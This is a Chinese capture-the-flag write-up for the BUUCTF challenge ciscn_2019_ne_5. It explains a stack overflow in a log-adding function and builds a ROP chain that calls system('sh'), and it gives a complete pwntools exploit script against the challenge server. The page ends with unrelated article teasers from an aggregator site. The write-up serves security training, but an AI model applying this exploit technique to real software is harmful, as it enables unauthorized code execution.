buu-ciscn_2019_ne_5-好久不见50

1. 背景分析

目标程序是一个存在漏洞的二进制文件,我们可以通过以下方式利用漏洞获取 shell:

  1. 程序中存在 system() 函数,但没有明显的 /bin/sh 字符串。

  2. 使用工具(如 ROPgadget)发现程序中有 sh 字符串,可以利用它作为 system() 的参数。

  3. 程序的交互逻辑需要先输入密码,然后选择操作,最后通过溢出漏洞触发 ROP 链。

2. 具体步骤
步骤 1:确定偏移量

通过分析程序的漏洞点(例如通过格式化字符串漏洞或堆溢出漏洞),找到可以覆盖返回地址的偏移量。假设偏移量为 0x48 + 4

步骤 2:查找关键地址

使用工具(如 ROPgadgetIDA Pro)查找以下地址:

  • system() 函数的地址。

  • main() 函数的地址(用于防止程序崩溃)。

  • sh 字符串的地址。

示例命令:

bash复制

ROPgadget --binary ./zzz --search "system"
ROPgadget --binary ./zzz --search "sh"

假设:

  • system() 的地址为 0x08048430

  • main() 的地址为 0x08048500

  • sh 的地址为 0x08048123

步骤 3:交互流程

程序的交互逻辑如下:

  1. 程序提示输入管理员密码。

  2. 程序提供选项,需要选择 1 添加 log。

  3. 程序提示输入新的 log,此时发送构造的 ROP 链。

  4. 再次选择操作,选择 4 触发漏洞。

步骤 4:构造 ROP 链

根据上述地址和偏移量,构造 ROP 链:

  1. 填充到返回地址的偏移量。

  2. 覆盖返回地址为 system() 的地址。

  3. system() 返回后跳转到 main(),防止程序崩溃。

  4. sh 的地址作为 system() 的参数。

步骤 5:发送 ROP 链并触发漏洞

通过网络交互,发送构造的 ROP 链,并触发漏洞。

第一个条件s1 == 'administrator'

 ADDLog():我们看到这里是输入log,跟我们的flag有关系

                          a1是我们外面传进来的src = 48,读取128个就造成了溢出

 

from pwn import *context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 0
elf = ELF('./zzz')def main():if content == 1:p = process('zzz')else:p =remote('node5.buuoj.cn',25739)#0x080482ea : shsh_addr     = 0x080482easystem_addr = elf.sym['system']payload     = b'a' * (0x48+0x4) + p32(system_addr) + b'aaaa' + p32(sh_addr)p.sendlineafter("Please input admin password:",'administrator')p.sendlineafter("0.Exit\n:",'1')p.sendlineafter("Please input new log info:",payload)p.sendlineafter("0.Exit\n:",'4')p.interactive()
main()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/33695.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

图论part4|827. 最大人工岛、127. 单词接龙、463. 岛屿的周长

827. 最大人工岛 🔗:827. 最大人工岛 - 力扣(LeetCode)827. 最大人工岛 - 给你一个大小为 n x n 二进制矩阵 grid 。最多 只能将一格 0 变成 1 。返回执行此操作后,grid 中最大的岛屿面积是多少?岛屿 由一…

SpeechCraf论文学习

Abstract 核心问题 挑战 语音风格包含细微的多样化信息(如情感、语调、节奏),传统基于标签/模板的标注方法难以充分捕捉,制约了语音-语言多模态模型的性能。 数据瓶颈: 大规模数据收集与高质量标注之间存在矛盾&…

SAIL-RK3576核心板应用方案——无人机视觉定位与地面无人设备通信控制方案

本方案以 EFISH-RK3576-SBC工控板 或 SAIL-RK3576核心板 为核心,结合高精度视觉定位、实时通信与智能控制技术,实现无人机与地面无人设备的协同作业。方案适用于物流巡检、农业植保、应急救援等场景,具备高精度定位、低延迟通信与强环境适应性…

PostgreSQL的学习心得和知识总结(一百七十一)|深入理解PostgreSQL数据库之 外连接消除 的使用和实现

目录结构 注:提前言明 本文借鉴了以下博主、书籍或网站的内容,其列表如下: 1、参考书籍:《PostgreSQL数据库内核分析》 2、参考书籍:《数据库事务处理的艺术:事务管理与并发控制》 3、PostgreSQL数据库仓库…

C语言实现括号匹配检查及栈的应用详解

目录 栈数据结构简介 C语言实现栈 栈的初始化 栈的销毁 栈的插入 栈的删除 栈的判空 获取栈顶数据 利用栈实现括号匹配检查 总结 在编程中,经常会遇到需要检查括号是否匹配的问题,比如在编译器中检查代码的语法正确性,或者在…

【机器学习chp12】半监督学习(自我训练+协同训练多视角学习+生成模型+半监督SVM+基于图的半监督算法+半监督聚类)

目录 一、半监督学习简介 1、半监督学习的定义和基本思想 2、归纳学习 和 直推学习 (1)归纳学习 (2)直推学习 3、半监督学习的作用与优势 4、半监督学习的关键假设 5、半监督学习的应用 6、半监督学习的常见方法 7、半…

2024 年第四届高校大数据挑战赛-赛题 A:岩石的自动鉴定

↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓

基于WebRTC与P2P技术,嵌入式视频通话EasyRTC实现智能硬件音视频交互,适配Linux、ARM、RTOS、LiteOS

EasyRTC不仅仅是一个连接工具,更是一个经过深度优化的通信桥梁。它在嵌入式设备上进行了特殊优化,通过轻量级SDK设计、内存和存储优化以及硬件加速支持,解决了传统WebRTC在嵌入式设备上的适配难题,显著节省了嵌入式设备的资源。 1…

[c语言日寄]字符串进阶:KMP算法

【作者主页】siy2333 【专栏介绍】⌈c语言日寄⌋:这是一个专注于C语言刷题的专栏,精选题目,搭配详细题解、拓展算法。从基础语法到复杂算法,题目涉及的知识点全面覆盖,助力你系统提升。无论你是初学者,还是…

Android源码学习之Overlay

在 Android Framework 开发中,Overlay 主要用于修改和替换系统或应用的资源,而无需直接修改源码,与源码解耦。Overlay 机制可以分为 两种类型: 静态 Overlay(Static Resource Overlay, SRO) 在 编译时 覆…

【MySQL】基本操作 —— DDL

目录 DDLDDL 常用操作对数据库的常用操作查看所有数据库创建数据库切换、显示当前数据库删除数据库修改数据库编码 对表的常用操作创建表数据类型数值类型日期和时间类型字符串类型 查看当前数据库所有表查看指定表的创建语句查看指定表结构删除表 对表结构的常用操作给表添加字…

网络安全需要学多久才能入门?

网络安全是一个复杂且不断发展的领域,想要入行该领域,我们需要付出足够多的时间和精力好好学习相关知识,才可以获得一份不错的工作,那么网络安全需要学多久才能入门?我们通过这篇文章来了解一下。 学习网络安全的入门时间因个人的…

【测试语言基础篇】Python基础之List列表

一、Python 列表(List) 序列是Python中最基本的数据结构。序列中的每个元素都分配一个数字 - 它的位置,或索引,第一个索引是0,第二个索引是1,依此类推。 Python有6个序列的内置类型,但最常见的是列表和元组。序列都可…

编译系统设计原理概述

目录 简介 词法分析 正则表达式 有穷状态自动机 从正则表达式到有穷自动机的转换 单词识别 简介 主要介绍编译系统设计过程中涉及的原理与技术,主要分为前端设计和后端设计两 个模块。前端部分包括词法分析器、语法分析器的构建和语义分析过程的设计…

ArcGIS Pro 车牌分区数据处理与地图制作全攻略

在大数据时代,地理信息系统(GIS)技术在各个领域都有着广泛的应用,而 ArcGIS Pro 作为一款功能强大的 GIS 软件,为数据处理和地图制作提供了丰富的工具和便捷的操作流程。 车牌数据作为一种重要的地理空间数据&#xf…

前端登录鉴权全解析:主流方案对比与实现指南

文章目录 一、常见登录鉴权方式概览1.1 主流方案对比1.2 技术特性对比 二、Session/Cookie方案2.1 实现原理2.2 代码实现2.3 优缺点分析 三、JWT方案3.1 实现原理3.2 代码实现3.3 优缺点分析 四、OAuth方案4.1 实现原理4.2 代码实现4.3 优缺点分析 五、SSO方案5.1 实现原理5.2 …

算法系列之回溯算法求解数独及所有可能解

有没有对数独感兴趣的朋友呢?数独作为一款经典的逻辑游戏,其目标是在一个9x9的方格中填入数字1至9,确保每一行、每一列以及每一个3x3的子网格中都包含这些数字且不重复。尽管数独的规则看似简单,但编写一个能够自动求解数独的程序…

华为hcia——Datacom实验指南——TCP传输原理和数据段格式

什么是TCP TCP是一种可靠的端到端的传输层协议,仅应用于单波通信。 采用TCP协议作为传输方式的应用层服务,再进行数据传输前,都需要进行TCP协议的创建。 TCP报文的格式 sequence number(序列号) 占4个字节&#x…

Vlog 片头制作

打开剪映,新建草稿,导入黑色背景。 拉长时间轴,背景时常调整为4.2秒。 添加文本,输入 5 个“|”,每个中间 2 个空格,如下| | | | |,然后手动放大文本,让中间显示出四个间隔。 继续添…

【Nacos】服务发布之优雅预热上线方案

目录 一、背景二、注册时机2.1、注册机制2.2、分析源码找到注册时机 三、注册前心跳健康检测3.1、方案实施3.2、源码分析3.3、优化代码 四、流量权重配置五、总结5.1、整体完整流程:5.2、流程图:5.1、优化方案完整代码: 一、背景 有些面向广…